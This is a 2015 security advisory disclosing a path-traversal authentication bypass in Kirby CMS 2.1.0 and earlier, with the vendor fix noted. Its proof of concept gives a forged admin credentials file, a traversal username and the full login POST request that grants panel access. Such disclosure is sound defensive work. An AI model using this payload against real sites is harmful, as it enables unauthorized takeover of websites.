__                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  

 <-- BACK TO legalhackers.com 

Follow @dawid_golunski ============================================= - Release date: 14.09.2015 - Discovered by: Dawid Golunski - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal II. BACKGROUND ------------------------- - Kirby CMS "Kirby is a file‑based CMS Easy to setup. Easy to use. Flexible as hell." http://getkirby.com/ III. INTRODUCTION ------------------------- KirbyCMS has a vulnerability that allows to bypass authentication in a hosting environment where users within the same shared environment can save/read files in a directory accessible by both the victim and the attacker. IV. DESCRIPTION ------------------------- As KirbyCMS is a file based CMS, it also stores authentication data within files in accounts directory, each user has its own password file such as: kirby/site/accounts/[username].php At login, KirbyCMS refer to the password file to verify the passwor hash. During the process, it fails to validate the resulting path to ensure that it does not contain path traversal sequences such as '../' within the login variable provided by a user. This makes it vulnerable to a path traversal attack and allows to bypass the authentication if an attacker is located in the same multi-user hosting environment and can write files to a public directory such as /tmp accessible by the victim site with KirbyCMS. The exact code responsible for this vulnerability is located in kirby/core/user.php file and is shown below: ---[ kirby/core/user.php ]--- abstract class UserAbstract { protected $username = null; protected $cache = array(); protected $data = null; public function __construct($username) { $this->username = str::lower($username); // check if the account file exists if(!file_exists($this->file())) { throw new Exception('The user account could not be found'); } ... } protected function file() { return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php'; } ----------------------------- In addition to the authentication bypass KirbyCMS was found to allow authentication over HTTP protocol (resulting in passwords being sent unencrypted), and to never expire authenticated sessions. V. PROOF OF CONCEPT ------------------------- KirbyCMS stores credentials in: kirby/site/accounts directory as PHP files to prevent the contents from being accessed directly via the web server. An example file with credentials looks as follows: ---[ victimuser.php ]--- <?php if(!defined('KIRBY')) exit ?> username: victim email: victim@mailserver.com password: > $2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC language: en role: admin ------------------------ To bypass the authentication an attacker who has an account in the same hosting environment as the victim can write the above credentials file containing an encrypted hash of the password: trythisout into a public directory such as: /tmp/bypassauth.php Because of the aformentioned Path Traversal vulnerability the attacker can use such credentials and log in as an administrator (via: http://victim-server.com/kirby/panel/login) with: Username: ../../../../../../../../tmp/bypassauth Password: trythisout which will produce a HTTP POST request similar to: POST /kirby/panel/login HTTP/1.1 Host: victim_kirby_site Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6... Content-Length: 149 username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1... This will cause KirbyCMS to load credentials from the path: /sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php As a result, the attacker will get the following response: <h2 class="hgroup hgroup-single-line cf"> <span class="hgroup-title"> <a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a> </span> <span class="hgroup-options shiv shiv-dark shiv-left"> getting access to the KirbyCMS control panel with admin rights. VI. BUSINESS IMPACT ------------------------- Users who make use of vulnerable versions of KirbyCMS in shared hosting environments are at risk of having their website modified by unauthorized users. An attacker who manages to log in as an administrator will be able to change all the existing content as well as upload new files. This attack could be combined with the: 'CSRF Content Upload and PHP Script Execution' vulnerability, also discovered by Dawid Golunski and described in a separate document. VII. SYSTEMS AFFECTED ------------------------- The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable. To exploit the vulnerability an attacker must be able to write a malicious credentials file on the system in a public directory that is accessible by the victim KirbyCMS site. This is a common situation on many hosting environments that allow to write/read files from temporary directories such as /tmp, /var/tmp etc. Such file could potentially also be uploaded by other means, even if the attacker does not have an account on the same server, such as anonymous FTP , an email attachment which gets saved in a tmp file on the server etc. VIII. SOLUTION ------------------------- Upgrade to the patched version 2.1.1 released by the vendor upon this advisory. IX. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt http://getkirby.com/ http://seclists.org/fulldisclosure/2015/Sep/index.html http://www.securiteam.com/ X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- 14.09.2015 - Final XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. Follow @dawid_golunski <-- BACK TO legalhackers.com